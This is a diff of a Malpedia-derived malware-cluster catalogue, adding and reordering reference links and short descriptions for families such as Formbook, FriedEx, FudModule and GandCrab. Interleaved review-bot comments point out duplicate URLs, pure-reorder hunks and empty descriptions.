+ "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://isc.sans.edu/diary/26806",
+ "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/",
"https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://asec.ahnlab.com/en/32149/",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
"http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html",
"https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
- "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
- "https://blog.talosintelligence.com/2018/06/my-little-formbook.html",
- "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/",
- "https://blog.netlab.360.com/purecrypter",
- "https://cert.gov.ua/article/955924",
- "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/",
- "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://link.medium.com/uaBiIXgUU8",
- "https://isc.sans.edu/diary/26806",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
"https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
"http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
- "https://youtu.be/aQwnHIlGSBM",
+ "https://cert.gov.ua/article/955924",
"https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails",
- "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I",
- "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf",
- "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
- "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
- "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
- "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/",
- "https://asec.ahnlab.com/en/32149/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii",
- "https://usualsuspect.re/article/formbook-hiding-in-plain-sight",
- "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
- "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://blog.netlab.360.com/purecrypter",
+ "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/",
+ "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/"
],
"synonyms": [
"win.xloader"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c7e7063b-b2a2-4046-8a19-94dea018eaa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8378b417-605e-4196-b31f-a0c96d75aa50",
"value": "Formbook"
},
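Review bot: the `related` block (dest-uuid `c7e7063b-b2a2-4046-8a19-94dea018eaa0`) is removed here too, and the removal is mixed into a hunk that also adds nine genuinely new references (the Check Point TrickGate and March 2023 posts, the Trend Micro IPFS piece, the Trustwave and Loginsoft OneNote write-ups, the Trellix Ukraine story, the Malwarebytes 2022 report PDF and both Fortinet CVE-2017-11882 Excel posts) among some 40 moved lines, which makes it hard to audit. Splitting the relation removal from the reference refresh into separate commits would make both reviewable. Minor: the synonym `win.xloader` is a Malpedia identifier rather than a display name, unlike `Thieflock` or `GraceWire` elsewhere in this diff.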
@@ -23738,8 +25141,8 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat",
"https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/",
"https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/"
],
"synonyms": [
@@ -23795,9 +25198,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki",
"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
- "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html",
"https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html"
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
],
"synonyms": [],
"type": []
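Review bot: the list keeps both `http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` and `https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html`; since the hunk already moves the `http://` line, drop it instead of moving it to the end of the array.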
@@ -23810,38 +25213,39 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex",
- "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
- "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/",
- "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
"https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
"https://sites.temple.edu/care/ci-rw-attacks/",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
- "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
- "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp"
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"
],
"synonyms": [
"BitPaymer",
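Review bot: the same scheme duplicate occurs here, with `http://www.secureworks.com/research/threat-profiles/gold-drake` and `https://www.secureworks.com/research/threat-profiles/gold-drake` both retained after the reorder; keep only the `https://` entry. The only real addition in this 38-to-39 line hunk is the LKA NRW press release (`https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen`).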
@@ -23853,6 +25257,23 @@
"uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d",
"value": "FriedEx"
},
+ {
+ "description": "FudModule is a user-mode DLL that gets the ability to read and write arbitrary kernel memory via the BYOVD technique. Its main goal is to turn off Windows system monitoring features, which is done by modifying kernel variables and removing kernel callbacks. Its actions may very likely affect various types of security products, e.g. EDRs, firewalls, antimalware and even digital forensics tools.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule",
+ "https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf",
+ "https://securityintelligence.com/posts/direct-kernel-object-manipulation-attacks-etw-providers/",
+ "https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/",
+ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "49b53f39-3e13-48e7-a2e3-5e173af343b3",
+ "value": "FudModule"
+ },
{
"description": "Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.",
"meta": {
@@ -23871,10 +25292,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
],
"synonyms": [
"RouterGod"
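Review bot: The only substantive change in this hunk is the added speakerdeck.com "winnti-is-coming" reference; the trendmicro, ptsecurity and blackhat lines that are removed are re-added unchanged in a different order. If the exporter emitted `refs` in a stable order (sorted, or in Malpedia's upstream order), this would be a one-line addition instead of a six-line hunk, and reviewers could tell real changes from churn at a glance.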
@@ -23889,11 +25311,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
"https://nao-sec.org/2021/01/royal-road-redive.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf"
+ "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
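Review bot: This hunk is a pure permutation and should not exist: the five URLs removed (recordedfuture cta-2021-1208, pwc 2020 retrospect, nttsecurity smanager, nao-sec royal-road, bitdefender Chinese-APT) are exactly the five URLs added, so the FunnyDream cluster is byte-for-byte equivalent apart from ordering. Emitting `refs` in a deterministic order in the generator would drop hunks like this from the diff entirely.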
@@ -23914,6 +25336,19 @@
"uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1",
"value": "Furtim"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive",
+ "https://www.youtube.com/watch?v=_qdCGgQlHJE"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5de632a3-bf82-4cef-90fa-e7199fdb932c",
+ "value": "FusionDrive"
+ },
{
"description": "FuxSocy has some similarities to win.cerber but is tracked as its own family for now.",
"meta": {
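Review bot: `"description": ""` on the new FusionDrive entry gives consumers nothing beyond the name, and the only non-Malpedia reference is a bare YouTube URL with no indication of what the talk is. Since the Malpedia page is already linked, a one-line summary taken from it should be filled in before the entry ships, and the video reference should at least be accompanied by a written source if one exists; an empty description on a new cluster is otherwise indistinguishable from a generator bug.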
@@ -23985,21 +25420,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
+ "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.wired.com/?p=2171700",
"https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
"https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
"https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "https://www.wired.com/?p=2171700",
- "https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
"https://www.lawfareblog.com/what-point-these-nation-state-indictments",
- "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf",
- "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf"
],
"synonyms": [
"GOZ",
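Review bot: Pure reorder again: the ten URLs removed from the Gameover P2P refs are the same ten that are added, so nothing about the cluster changes. While the list is being rewritten anyway, `"https://www.wired.com/?p=2171700"` is a WordPress post-id query URL sitting next to the canonical `"https://www.wired.com/2017/03/russian-hacker-spy-botnet/"`; check whether the two resolve to the same article and, if so, keep only the canonical slug.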
@@ -24011,6 +25446,20 @@
"uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f",
"value": "Gameover P2P"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.game_player_framework",
+ "https://www.youtube.com/watch?v=yVqALLtvkN8&t=8117s",
+ "https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3efdc56a-793c-4fbb-99ea-a4d53899713a",
+ "value": "GamePlayerFramework"
+ },
{
"description": "",
"meta": {
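Review bot: The new GamePlayerFramework entry has an empty `description` even though one of its references is the Securelist "DiceyF deploys GamePlayerFramework in online casino development studio" article, which is exactly the kind of source the description should be summarised from. The second reference is a YouTube link with a `&t=8117s` timestamp; that is fine as a pointer into a long recording, but a written source (the Securelist post) should carry the entry, not the video.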
@@ -24028,63 +25477,64 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
- "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html",
- "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html",
- "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/",
- "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/",
- "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
- "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
- "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
- "http://www.secureworks.com/research/threat-profiles/gold-garden",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
- "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/",
- "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom",
- "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
- "https://vimeo.com/449849549",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/",
"https://unit42.paloaltonetworks.com/revil-threat-actors/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
- "http://asec.ahnlab.com/1145",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
- "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
- "https://isc.sans.edu/diary/23417",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
"https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/",
"http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
- "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind",
+ "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
+ "https://vimeo.com/449849549",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/",
+ "https://www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
+ "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
"https://www.secureworks.com/research/threat-profiles/gold-garden",
- "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html"
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-shutting-down-after-claiming-to-earn-25-billion/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-operator-arrested-in-belarus/",
